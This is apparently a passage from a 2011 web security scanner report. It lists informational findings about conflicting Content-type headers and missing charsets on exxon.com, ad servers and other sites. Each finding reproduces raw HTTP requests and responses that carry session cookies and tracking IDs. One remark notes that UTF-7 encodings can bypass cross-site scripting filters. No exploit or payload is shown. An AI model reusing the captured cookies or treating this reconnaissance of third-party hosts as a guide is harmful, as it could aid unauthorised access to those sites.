<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.6. http://exxon.com/Images/lightview/inner_prev.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/inner_prev.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/inner_prev.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.7. http://exxon.com/Images/lightview/inner_slideshow_stop.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/inner_slideshow_stop.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/inner_slideshow_stop.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.8. http://exxon.com/Images/lightview/loading.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/loading.gif

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/loading.gif HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.9. http://exxon.com/Images/lightview/prev.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/prev.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/prev.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.10. http://exxon.com/Images/lightview/topclose.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/topclose.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/topclose.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.11. http://exxon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /favicon.ico HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.12. http://www.fuelprogress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fuelprogress.com
Path:   /favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /favicon.ico HTTP/1.1
Host: www.fuelprogress.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQQQRCDC=ECDLGFBCJCMIMDCONIELABEF

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:32:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
28. HTML does not specify charset  previous  next
There are 28 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

28.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-00_11394222771308922260; expires=Wed, 22-Jun-2016 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11394222771308922260; expires=Fri, 24-Jun-2011 13:46:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6651
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
28.2. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8707574490954974&output=html&h=250&slotname=0966043985&w=300&lmt=1308940014&flash=10.3.181&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&dt=1308922014502&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=7288386218&correlator=1308922009816&frm=4&adk=3718087554&ga_vid=1055506945.1308922001&ga_sid=1308922001&ga_hid=1023183180&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895143&fu=0&ifi=2&dtd=19&xpc=95bno1LOUQ&p=http%3A//www.gamersdailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CEJozEpiencOrSADIBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDe; PRgo=BBBAAuILBBVCFUE6; PRimp=28A60400-6EA1-2C4A-0209-D6A000040100; PRca=|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 13:31:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 14924
Set-Cookie:PRvt=CEJozEpiencOrSADIBBeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDeJWuEpnU4MzRwAAFBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=75A60400-3338-7034-0309-5AE000050101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJyC*1646:2|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJyCAA08:2|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FADR:2|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GBLt:2|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FADRGBLt:2|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
28.3. http://beta.telkom.co.id/op.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /op.php

Request

GET /op.php?icid=37 HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.3.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:32 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 134
Content-Type: text/html

<script>window.location.replace('http://beta.telkom.co.id/rss/SimplePie/index.php?url=http://www.telkomsel.com/rss/product');</script>
28.4. http://cdn.at.atwola.com/_media/uac/tcodeqt.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.at.atwola.com
Path:   /_media/uac/tcodeqt.html

Request

GET /_media/uac/tcodeqt.html HTTP/1.1
Host: cdn.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DD6D67B6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1MDc6NTA1NTc6NTQyNTU6NTM3Nzg6NTExODI6NTQyNTI6NTA5NjE6NTQyMDk6NTY4MzU6NTU0Njc6NTY2NzM6NTczNzI6NTY3ODA6NTYyMzI6NTcyODg=

Response

HTTP/1.1 200 OK
P3P: CP="CURo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV STA DEM OUR"
Last-Modified: Thu, 16 Jun 2011 14:03:04 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 3240
Expires: Fri, 24 Jun 2011 14:15:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 24 Jun 2011 14:15:30 GMT
Connection: close

<HTML>
<BODY>
<SCRIPT TYPE='text/javascript'>
var k="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var qc='',qcSet=0,qcCk='',qcTac='',kv,v1,v2,x='',z='',o='',t='',dr,dr1,ag=0,ha=
...[SNIP]...
28.5. http://content.pulse360.com/43AE06D6-306A-11E0-9FBF-51F23F5BF877  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /43AE06D6-306A-11E0-9FBF-51F23F5BF877

Request

GET /43AE06D6-306A-11E0-9FBF-51F23F5BF877 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:39 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 9599

document.write('<style type="text/css"> div#p360-hybrid160x600aquabulge-43AE06D6-306A-11E0-9FBF-51F23F5BF877 { width: 160px; left: 0; font-family: sans-serif; position: relative; display
...[SNIP]...
28.6. http://content.pulse360.com/F81E71FC-348C-11E0-8455-C9C5E4064C68  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /F81E71FC-348C-11E0-8455-C9C5E4064C68

Request

GET /F81E71FC-348C-11E0-8455-C9C5E4064C68 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:39 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 10071

document.write('<style type="text/css"> div#p360-hybrid550x250TriadBlackBlue-F81E71FC-348C-11E0-8455-C9C5E4064C68 { width: 550px; left: 0; font-family: sans-serif; position: relative; di
...[SNIP]...
28.7. http://display.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Request

GET /?aid=244&tax=par HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:54 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:54 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:54 GMT
Content-Length: 198
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
28.8. http://ds.addthis.com/red/psi/sites/beta.telkom.co.id/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/beta.telkom.co.id/p.json

Request

GET /red/psi/sites/beta.telkom.co.id/p.json?callback=_ate.ad.hpr&uid=4dce8a530508b02d&url=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F&17q1shy HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308911539.1WV|1308911539.1FE|1308225884.19F|1306359996.1OD|1308911539.60|1308225884.1VV|1308911539.1EY; psc=4; uid=4dce8a530508b02d

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 24 Jun 2011 13:16:29 GMT; Path=/
